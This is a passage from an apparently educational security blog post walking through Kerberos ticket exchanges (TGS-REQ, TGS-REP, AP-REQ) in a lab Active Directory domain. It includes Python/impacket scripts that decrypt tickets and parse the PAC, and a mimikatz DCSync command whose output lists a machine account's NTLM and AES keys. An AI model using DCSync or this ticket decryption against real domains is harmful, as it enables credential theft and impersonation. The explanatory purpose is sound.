46c567d15eee7f5e396c2ee9f3e5658b33f5a8c1d60e3fb3e6302df7eba13ba229a2b2b76b52f67a3305e9519a476682c57637822f4f8f3795e50ac9d3095e42bd65ccf5424b1876bbc1e383f188a70876bd44d3212884b6ccd84b35690ea7ee24e9c7495414720ed1958a27f6f66cafc3b2fade20cbc36fde6d88060d19e027f2b4c2d99e77660b2c1f3c9fa70e7e33e893e695b9effeb60e786ee77728a49c308c587d5be72381b30baac7581e72ffaf181a5a15632f89b0fd148823c5ef4f91b631f60733afb0fcbb721b619b7fe6ce86d68b4d056ccf65ab8fea967140590b3318d0869576fd77cce2b0306121b86b45e0584255f37c788b5f888ef41167d74eb0374c7d6fd925f9f82822fdb579f00693494d3ff4334fccec6e1b9eb97ebbc6108f6c59e53078b039ec818fdf32860be1e5a30210ec821a042de32a9ca47975f\"\r\njnk = cipher.decrypt(key, 2, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)\r\nfor i in dec:\r\n  print i<\/pre>\n<p>Output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=1356922880\r\n field-1=Sequence:\r\n  field-0=18\r\n  field-1=0x64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64\r\n\r\n field-2=JNKFO.LAB\r\n field-3=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   win10user\r\n\r\n field-4=Sequence:\r\n  field-0=0\r\n  field-1=\r\n\r\n field-5=20200424142303Z\r\n field-6=20200424142303Z\r\n field-7=20200425002303Z\r\n field-8=20200425142303Z\r\n field-9=SequenceOf:\r\n  Sequence:\r\n   field-0=1\r\n   field-1=0x308202ba308202b6a00402020080a18202ac048202a8050000000000000001000000b801000058000000000000000a0000001c00000010020000000000000c000000500000003002000000000000060000001000000080020000000000000700000014000000900200000000000001100800cccccccca80100000000000000000200629531ad411ad601ffffffffffffff7fffffffffffffff7fce9547d7da10d601ce55b101a411d601ce15a1ccdb31d60112001200040002000000000008000200000000000c0002000000000010000200000000001400020000000000180002004f0000005004000001020000010000001c000200200000000000000000000000000000000000000004000600200002000a000c00240002002800020000000000000000001000000000000000000000000000000000000000000000000000000000000000010000002c000200000000000000000000000000090000000000000009000000770069006e003100300075007300650072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000102000007000000030000000000000002000000440043000600000000000000050000004a004e004b0046004f000000040000000104000000000005150000002e9b71bded76d1b44c28fa960100000030000200070000000100000001010000000000120100000000000000803d2fdd431ad6011200770069006e003100300075007300650072000000000026001000120038000100000000000000770069006e0031003000750073006500720040006a006e006b0066006f002e006c006100620000004a004e004b0046004f002e004c004100420000000000000010000000f22e9087d4255c88f2db506376ffffffae3c04a84d7d18d4c9282f7a5da45a3400000000\r\n<\/pre>\n<ul>\n<li>Username and Realm: win10user@JNKFO.LAB<\/li>\n<li><strong>Session key<\/strong>: The same session key as the key in message A<\/li>\n<li>Timestamp and lifetime<\/li>\n<li>PAC data<\/li>\n<\/ul>\n<p>So, at this step, once the client gets these messages, it decrypts Message A using the key derived from the user&#8217;s password and obtains the <span style=\"color: #ff0000;\">session key\u00a0<span style=\"color: #000000;\">which as you noticed is the same in messages A and B.<\/span><br \/>\n<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-606\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15.png\" alt=\"\" width=\"673\" height=\"244\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-606\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15.png\" alt=\"\" width=\"673\" height=\"244\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15.png 673w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/15-300x109.png 300w\" sizes=\"auto, (max-width: 673px) 100vw, 673px\" \/><\/noscript><\/p>\n<p>The client can&#8217;t decrypt Message B as it&#8217;s encrypted using the TGS key (krbtgt hash) as prementioned, but yet the TGT will be stored in the cache to be used later.<br \/>\nNow the client needs to get a ticket with which he can access the service he needs, the SMB service with which we were communicating in the 1st place.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"TGS-REQ\"><\/span>TGS-REQ<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>At this point, the client will start asking to deal with the targeted service, not the TGT as we were communicating with.<\/p>\n<p>So the client sends the TGS-REQ which includes 2 parts, a plaintext part that indicates the service the client needs to access (The SPN)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-630\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-1024x703.png\" alt=\"\" width=\"1024\" height=\"703\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-630\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-1024x703.png\" alt=\"\" width=\"1024\" height=\"703\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-1024x703.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-300x206.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1-768x527.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/17-1.png 1041w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Which cifs\/win10.jnkfo.lab<\/p>\n<p>and another 2 encrypted messages<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_C\"><\/span>Message C<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This contains the <strong>TGT<\/strong> which was retrieved from the previous step (<strong>Message B<\/strong>)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-610\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18.png\" alt=\"\" width=\"949\" height=\"419\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-610\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18.png\" alt=\"\" width=\"949\" height=\"419\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18.png 949w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18-300x132.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/18-768x339.png 768w\" sizes=\"auto, (max-width: 949px) 100vw, 949px\" \/><\/noscript><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_D\"><\/span>Message D<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>or the Authenticator, which is an encrypted message generated by the client contains the username and the timestamp<\/p>\n<p>This message (authenticator) is encrypted using the session key retrieved from <strong>Message A<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-611\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20.png\" alt=\"\" width=\"939\" height=\"300\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-611\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20.png\" alt=\"\" width=\"939\" height=\"300\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20.png 939w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20-300x96.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/20-768x245.png 768w\" sizes=\"auto, (max-width: 939px) 100vw, 939px\" \/><\/noscript><\/p>\n<p>The client sends this request to the KDC which do the following<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-613\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21.png\" alt=\"\" width=\"600\" height=\"352\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-613\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21.png\" alt=\"\" width=\"600\" height=\"352\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21.png 600w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/21-300x176.png 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/noscript><\/p>\n<ol>\n<li>Extract the TGT from message C<\/li>\n<li>Decrypt the TGT at <strong>Message C<\/strong> using the TGS key (krbtgt key which is stored at the KDC), and retrieve the session key, username, and the timestamp from the TGT (message B).<\/li>\n<li>Use the session key to decrypt the authenticator which contains the username and the timestamp.<\/li>\n<li>Compare the username and timestamp from the TGT (1) with the username and timestamp from the Authenticator (2)<\/li>\n<li>Check the TGT lifetime to make sure it&#8217;s not expired<\/li>\n<\/ol>\n<p>If everything is ok, then the user proved his identity and the authentication process will go on<\/p>\n<h2><span class=\"ez-toc-section\" id=\"TGS-REP\"><\/span>TGS-REP<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>After validating the client&#8217;s identity, the KDC needs to create a TGS, the one which the client will use to authenticate to the service.<\/p>\n<p>The KDC generates a random key (Service session key) and sends back the TGS-REP which includes 2 messages.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-615\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22.png\" alt=\"\" width=\"1009\" height=\"642\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-615\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22.png\" alt=\"\" width=\"1009\" height=\"642\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22.png 1009w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22-300x191.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/22-768x489.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/noscript><\/p>\n<h3><span class=\"ez-toc-section\" id=\"Message_E\"><\/span>Message E<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>This part includes a plaintext part which contains the SPN the user is trying to access (cifs\/win10.jnkfo.lab), and another part which is encrypted using the service key, which means that the user is unable to decrypt or manipulate it, this includes the following information<\/p>\n<ul>\n<li>Service session key<\/li>\n<li>Username<\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>PAC information<\/li>\n<\/ul>\n<p>as mentioned this part can be decrypted using the service key, for accessing such a service the Kerberos is using the machine key which can be obtained via<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">imikatz # lsadump::dcsync \/user:WIN10$ \/domain:jnkfo.lab\r\n[DC] 'jnkfo.lab' will be the domain\r\n[DC] 'DC.jnkfo.lab' will be the DC server\r\n[DC] 'WIN10$' will be the user account\r\n\r\nObject RDN           : WIN10\r\n\r\n** SAM ACCOUNT **\r\n\r\nSAM Username         : WIN10$\r\nAccount Type         : 30000001 ( MACHINE_ACCOUNT )\r\nUser Account Control : 00001000 ( WORKSTATION_TRUST_ACCOUNT )\r\nAccount expiration   :\r\nPassword last change : 3\/29\/2020 7:16:42 PM\r\nObject Security ID   : S-1-5-21-3178339118-3033626349-2532976716-1105\r\nObject Relative ID   : 1105\r\n\r\nCredentials:\r\n  Hash NTLM: 1ad9c160bd7ab9cb4b7c890c96862305\r\n    ntlm- 0: 1ad9c160bd7ab9cb4b7c890c96862305\r\n    ntlm- 1: 5e591b183142300b96281c9b75aaaf99\r\n    lm  - 0: 3c0bd3dace8dc8f6fabcb58db7761cf3\r\n    lm  - 1: 1c9cbdcb85af1552edd2e70e4379563d\r\n\r\nSupplemental Credentials:\r\n* Primary:Kerberos-Newer-Keys *\r\n    Default Salt : JNKFO.LABhostwin10.jnkfo.lab\r\n    Default Iterations : 4096\r\n    Credentials\r\n      aes256_hmac       (4096) : d9060eb5200bf63461b1525277212c2d6cddb66a3eac26807183809e27b41ca8\r\n      aes128_hmac       (4096) : 1b972a7269a8d841d15bd32577e39a27\r\n      des_cbc_md5       (4096) : b0e97c31dc9edf3b<\/pre>\n<p>So this part can be decrypted using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from impacket.krb5.pac import PACTYPE, VALIDATION_INFO\r\nfrom pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\nimport struct\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"d9060eb5200bf63461b1525277212c2d6cddb66a3eac26807183809e27b41ca8\"))\r\nmycipher = \"f9eec5f1876a6f53fdaa7884b03205c743fc009487b1eb8b68594e13a0321a39dc42d5e5f747184ccd1ffb59b5956ee20b53e4b0256d688ddfb01c00082ec86f14bf276c68f86bf9f9244ea0f2a568b0e278f82190b388294500deb8860f6301e5dc383c0c8869fa396ddae8e18230d153b112396ec4cf692f30374fb53e4279e805e681fc724924d0d1288488b0c2b08fb40987620a335ca4613d919b3733c5270f34151d6d4648e8c20d4d3ad3616cc330fed0b7c734cd77add28beda3efe5a04dc148b611be00117ca500fd3ee3d00efebb62085eff1883d5a40a9b150798439e7e6f6e52b102246a9a94bface1409bdf08063d0bedc6c95b4fc65c89dc9f79e98b9f7909882253cfb2c6029e2f308bb9b5ef69c30593365194ea73d55962198c9b6753540adf472165b73a84ec0b74bc37d02658c807f396036cbf3f868c47e8a9873a0eebdbdb46ddb97063ee4972f8e4d405d62606c4ec43497fe44989d2deb14b5ad22a6425bfb90416ac8a4c28bd2c40097c5a63e18eb4b9e158a3785954f5edb6b994f2ed1e03734d1b5da870dcce547e383d09efd4f13c35a19121d7c6a3bbc4267307b5f9d9c9ab84a4a786bb7affce9055c92ed3e9245ad2070116a8cd25dc0545e8602fba1d726bfd2ee4502e1b3b72f2c4ec555a42494390ea97726cbaa1587ac38bfa5280ebce0429f82076d4fb02dc28273b9cf316c58348feb6b693df5dddc3ff216764daac836aadcfbb708827ba01ae81f24e7ce62b95072d075269ba7c69b1f4d6123389cffdcf6f0289d4d17f53987cdd004bd6f6c222dd3a8beb4e16da02b1651848492c5020a713f293f4366280fb0cd9d0586dd62eb531f5cdeeb08fe607971cc4698aa01013e0729978f794f2eb4009c76c56534a9942c3d29d84d630cccfbe3ef78950a57535df0410889eec9197470f556a21235259bb7a82d2cd59738b7ea2ea87e9dc9fc6e1fdc50dd59df0a1818ceade470c05b4b2e4a1c69aba5b0edc5c2e8bb9f28e16bf1bd0b1b960bfc80f7ebc729c3f83aca48b24d411368a95354db446a6450896969644c8892914b974a066ddce78ecd738f76546153095f70177630b6d8d961a806f2b959be6e2a3c73d430f1dae9b562876ff602966f48d65fd33af396ed31c79ca2a8bf409e04779ec0d978f3624441645f290d11b20f5847ea0211d8377ad61127dcbf02a1fa8ab2b7ed51ed9abf0d484c5ac3315d1b864b55d598f6b705509c37fb88eddc65ddb136c090e285c33968f32e1816e29fbcfa307f0cdef28fa7d6b0d54cf1c525e6be479a1\"\r\njnk = cipher.decrypt(key, 2, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)[0]\r\nprint \"------------------- Ticket Data ------------------\"\r\nprint dec<\/pre>\n<p>the output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=1084293120\r\n field-1=Sequence:\r\n  field-0=23\r\n  field-1=0x2c0d86037d0014a317d8c5aee4e8d339\r\n\r\n field-2=JNKFO.LAB\r\n field-3=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   win10user\r\n\r\n field-4=Sequence:\r\n  field-0=1\r\n  field-1=\r\n\r\n field-5=20200424142303Z\r\n field-6=20200424142303Z\r\n field-7=20200425002303Z\r\n field-8=20200425142303Z\r\n field-9=SequenceOf:\r\n  Sequence:\r\n   field-0=1\r\n   field-1=0x308202ba308202b6a00402020080a18202ac048202a8050000000000000001000000b801000058000000000000000a0000001c00000010020000000000000c000000500000003002000000000000060000001000000080020000000000000700000014000000900200000000000001100800cccccccca80100000000000000000200629531ad411ad601ffffffffffffff7fffffffffffffff7fce9547d7da10d601ce55b101a411d601ce15a1ccdb31d60112001200040002000000000008000200000000000c0002000000000010000200000000001400020000000000180002004f0000005004000001020000010000001c000200200000000000000000000000000000000000000004000600200002000a000c00240002002800020000000000000000001000000000000000000000000000000000000000000000000000000000000000010000002c000200000000000000000000000000090000000000000009000000770069006e003100300075007300650072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000102000007000000030000000000000002000000440043000600000000000000050000004a004e004b0046004f000000040000000104000000000005150000002e9b71bded76d1b44c28fa960100000030000200070000000100000001010000000000120100000000000000803d2fdd431ad6011200770069006e003100300075007300650072000000000026001000120038000100000000000000770069006e0031003000750073006500720040006a006e006b0066006f002e006c006100620000004a004e004b0046004f002e004c004100420000000000000010000000ad9bd35bb460f8b45d7dd91576ffffff69c616734739a1f74cea493a458977f900000000\r\n<\/pre>\n<p>You&#8217;ll note<\/p>\n<ul>\n<li>Encryption type: 23<\/li>\n<li>A <span style=\"color: #ff0000;\">service session key<\/span>: 2c0d86037d0014a317d8c5aee4e8d339<\/li>\n<li>Client name:win10user<\/li>\n<li>realm: JNKFO.LAB<\/li>\n<li>Timestamp and PAC<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"Message_F\"><\/span>Message F<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-616\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23.png\" alt=\"\" width=\"819\" height=\"259\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-616\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23.png\" alt=\"\" width=\"819\" height=\"259\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23.png 819w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23-300x95.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/23-768x243.png 768w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/noscript><\/p>\n<p>This message is encrypted using the session key which is already cached at the client (check AS-REP), so the user can decrypt this one easily and obtain<\/p>\n<ul>\n<li><span style=\"color: #ff0000;\">Service session key<\/span><\/li>\n<li>Timestamp<\/li>\n<li>Lifetime<\/li>\n<li>Service name<\/li>\n<\/ul>\n<p>Note that the Service session key is found in both messages.<\/p>\n<p>So let&#8217;s decrypt that cipher using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from impacket.krb5.pac import PACTYPE, VALIDATION_INFO\r\nfrom pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"64586df7e4620c197c1889f84d3aa825c4c6060d12633a83bfc9af11f5fdab64\"))\r\nmycipher = \"7d996b5c8ce08c1f8ab31471dde8d6d892a4f8ff3cec5527f357b425786c05e7f3616f6ea6768c47202924f6a9f86308f3ff873f43e9d9a6715da5cb8ce48b2b8ecfac5e738e03cb0546e870d3d8ed300d5fe009de6e4cea0312f4e1c6ca7ca62c502aedbc45e09bb6617753860e7613be068e27aa993b08619ad6ba148659505ca9443525b63186845ae4a69c383587c742a2cb962ff0d2a8b56edb389987d472d76962d0ddb146f1dfcf198a7f9a96a80c8c39637905dde9e1044774a027f0cc17a553ec8a30e71ecda7f78ef80f20cfec0a5ad5bfdb4560e54fbb9935fd6526b7d6404e43952a07f3fca99bb48a2e0b78fa8b2d2e7008365496a989b573\"\r\njnk = cipher.decrypt(key, 8, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)[0]\r\nprint dec<\/pre>\n<p>The output is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=Sequence:\r\n  field-0=23\r\n  field-1=0x2c0d86037d0014a317d8c5aee4e8d339\r\n\r\n field-1=SequenceOf:\r\n  Sequence:\r\n   field-0=0\r\n   field-1=20200424142303Z\r\n\r\n field-2=2035677725\r\n field-3=1084293120\r\n field-4=20200424142303Z\r\n field-5=20200424142303Z\r\n field-6=20200425002303Z\r\n field-7=20200425142303Z\r\n field-8=JNKFO.LAB\r\n field-9=Sequence:\r\n  field-0=2\r\n  field-1=SequenceOf:\r\n   cifs   win10.jnkfo.lab\r\n\r\n field-10=SequenceOf:\r\n  Sequence:\r\n   field-0=165\r\n   field-1=0x1f000000\r\n<\/pre>\n<p>Did u notice the <span style=\"color: #ff0000;\">2c0d86037d0014a317d8c5aee4e8d339<\/span> ?!<\/p>\n<p>So right now the client has obtained the service session key and the service ticket, the client is ready to communicate with the service<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Accessing_the_service_AP-REQ\"><\/span>Accessing the service (AP-REQ)<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The communication between the client and the KDC is now over, the client needs to access the SMB service.<br \/>\nIt will do so by sending a couple messages to the service<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-617\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24.png\" alt=\"\" width=\"979\" height=\"763\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-617\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24.png\" alt=\"\" width=\"979\" height=\"763\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24.png 979w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24-300x234.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/24-768x599.png 768w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><\/noscript><\/p>\n<p>1 &#8211; The service ticket (Message E) which the client got before<\/p>\n<p>2 &#8211; Message G or Authenticator message<\/p>\n<p>Which consist of a username and the timestamp, This authenticator is encrypted using the service session key which the client obtained in the previous step from the message F.<\/p>\n<p>Once the service receives this request, it decrypts the service ticket using its own key<br \/>\nExtract the <span style=\"color: #ff0000;\">service session key<\/span>, <span style=\"color: #0000ff;\">username, and timestamp<\/span><br \/>\nUse the service session key to decrypt the authenticator message and retrieve the <span style=\"color: #0000ff;\">username and timestamp<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-618\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25.png\" alt=\"\" width=\"549\" height=\"318\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-618\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25.png\" alt=\"\" width=\"549\" height=\"318\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25.png 549w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/25-300x174.png 300w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/noscript><\/p>\n<p>The server then<\/p>\n<ol>\n<li>compares username from the authenticator with the username from the service ticket<\/li>\n<li>compares timestamp from the authenticator with the timestamp from the service ticket<\/li>\n<li>check the lifetime to make sure that the service ticket isn&#8217;t expired<\/li>\n<\/ol>\n<p>If everything is ok, then the <span style=\"color: #ff0000;\">authentication<\/span> process is over, the client is allowed to authenticate to the service as long as the service ticket isn&#8217;t expired.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"Authorization\"><\/span>Authorization<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>As mentioned earlier, the whole process is about authentication, not authorization.<br \/>\nYou will notice that there are no privileges checks that took place at all during the entire process, as this will depend on the service or the local machine&#8217;s policies itself.<br \/>\nFor that matter, the PAC part is also attached to the ticket.<br \/>\nIt includes information about the user group memberships among other information.<br \/>\nWe can read the PAC attached to the service ticket using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\">from impacket.krb5.pac import PACTYPE, VALIDATION_INFO\r\nfrom pyasn1.codec.der import decoder, encoder\r\nfrom binascii import unhexlify, hexlify\r\nfrom impacket.krb5.crypto import Key, _enctype_table, InvalidChecksum\r\nimport struct\r\ncipher = _enctype_table[18]\r\nkey = Key(18, unhexlify(\"d9060eb5200bf63461b1525277212c2d6cddb66a3eac26807183809e27b41ca8\"))\r\nmycipher = \"f9eec5f1876a6f53fdaa7884b03205c743fc009487b1eb8b68594e13a0321a39dc42d5e5f747184ccd1ffb59b5956ee20b53e4b0256d688ddfb01c00082ec86f14bf276c68f86bf9f9244ea0f2a568b0e278f82190b388294500deb8860f6301e5dc383c0c8869fa396ddae8e18230d153b112396ec4cf692f30374fb53e4279e805e681fc724924d0d1288488b0c2b08fb40987620a335ca4613d919b3733c5270f34151d6d4648e8c20d4d3ad3616cc330fed0b7c734cd77add28beda3efe5a04dc148b611be00117ca500fd3ee3d00efebb62085eff1883d5a40a9b150798439e7e6f6e52b102246a9a94bface1409bdf08063d0bedc6c95b4fc65c89dc9f79e98b9f7909882253cfb2c6029e2f308bb9b5ef69c30593365194ea73d55962198c9b6753540adf472165b73a84ec0b74bc37d02658c807f396036cbf3f868c47e8a9873a0eebdbdb46ddb97063ee4972f8e4d405d62606c4ec43497fe44989d2deb14b5ad22a6425bfb90416ac8a4c28bd2c40097c5a63e18eb4b9e158a3785954f5edb6b994f2ed1e03734d1b5da870dcce547e383d09efd4f13c35a19121d7c6a3bbc4267307b5f9d9c9ab84a4a786bb7affce9055c92ed3e9245ad2070116a8cd25dc0545e8602fba1d726bfd2ee4502e1b3b72f2c4ec555a42494390ea97726cbaa1587ac38bfa5280ebce0429f82076d4fb02dc28273b9cf316c58348feb6b693df5dddc3ff216764daac836aadcfbb708827ba01ae81f24e7ce62b95072d075269ba7c69b1f4d6123389cffdcf6f0289d4d17f53987cdd004bd6f6c222dd3a8beb4e16da02b1651848492c5020a713f293f4366280fb0cd9d0586dd62eb531f5cdeeb08fe607971cc4698aa01013e0729978f794f2eb4009c76c56534a9942c3d29d84d630cccfbe3ef78950a57535df0410889eec9197470f556a21235259bb7a82d2cd59738b7ea2ea87e9dc9fc6e1fdc50dd59df0a1818ceade470c05b4b2e4a1c69aba5b0edc5c2e8bb9f28e16bf1bd0b1b960bfc80f7ebc729c3f83aca48b24d411368a95354db446a6450896969644c8892914b974a066ddce78ecd738f76546153095f70177630b6d8d961a806f2b959be6e2a3c73d430f1dae9b562876ff602966f48d65fd33af396ed31c79ca2a8bf409e04779ec0d978f3624441645f290d11b20f5847ea0211d8377ad61127dcbf02a1fa8ab2b7ed51ed9abf0d484c5ac3315d1b864b55d598f6b705509c37fb88eddc65ddb136c090e285c33968f32e1816e29fbcfa307f0cdef28fa7d6b0d54cf1c525e6be479a1\"\r\njnk = cipher.decrypt(key, 2, unhexlify(mycipher))\r\ndec = decoder.decode(jnk)[0]\r\nprint \"------------------- Ticket Data ------------------\"\r\nprint dec\r\n\r\npacData = dec['field-9'][0]['field-1']\r\ndecAuthData = decoder.decode(pacData)[0][0]['field-1']\r\npacBuffers = PACTYPE(str(decAuthData))\r\npacBuffer = pacBuffers['Buffers']\r\npacBufferHex = hexlify(pacBuffer)\r\ndword = 8\r\nbuff = []\r\nfor i in range(0,32,dword):\r\n  buffstr = pacBufferHex[i:i+dword]\r\n  buffint = int(buffstr,16)\r\n  buffstr = hexlify(struct.pack('&lt;L',buffint))\r\n  buffint = int(buffstr,16)\r\n  buff.append(buffint)\r\n\r\npacInfoList = buff\r\nauthDataLength = pacInfoList[1]\r\nauthDataOffset = pacInfoList[2]\r\nauthDataEnd = (authDataLength * 2) - 40\r\noffsetStart = 24 + authDataOffset*2\r\nauthDataHex = pacBufferHex[offsetStart:offsetStart+authDataEnd]\r\nprint \"------------------- PAC Data ------------------\"\r\nfinalValidationInfo = VALIDATION_INFO()\r\nfinalValidationInfo.fromStringReferents(unhexlify(authDataHex))\r\nfinalValidationInfo.dump()\r\n<\/pre>\n<p>Output is<\/p>\n<pre class=\"EnlighterJSRAW\" 